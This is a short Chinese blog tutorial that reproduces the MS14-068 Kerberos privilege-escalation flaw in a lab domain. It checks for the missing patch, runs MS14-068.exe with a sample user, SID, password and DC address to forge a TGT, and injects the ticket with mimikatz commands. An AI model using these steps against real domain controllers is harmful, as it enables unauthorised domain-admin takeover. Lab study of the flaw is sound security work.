大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。
域渗透之MS14-68域提权漏洞
漏洞概述
漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。
利用条件
域控机器没有打MS14-068的补丁(KB3011780)
需要一个域内用户和域内用户密码或hash,域内用户的suid
漏洞原理
服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器
MS14-068漏洞分析:Kerberos协议探索系列之票据篇
漏洞复现
查询域控机器是否存在该补丁
systeminfo |find "3011780"
C:\Users\douser\Desktop>dir \2.168.183.130\c$
拒绝访问。
使用普通用户权限,测试访问域控的C盘共享,访问被拒绝
MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>
MS14-068.exe -u douser@demo -s S-1-5-21-979886063-111190
0045-1414766810-1107 -d 192.168.183.130 -p Dotest123
这里获取到一个TGT_douser@demo.com.ccache文件
清空票据
kerberos::purge //清空已有票据
kerberos::list //查看票据
注入票据
kerberos::ptc TGT_douser@demo.com.ccache
mimikatz 不支持03系统注入
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/119830.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...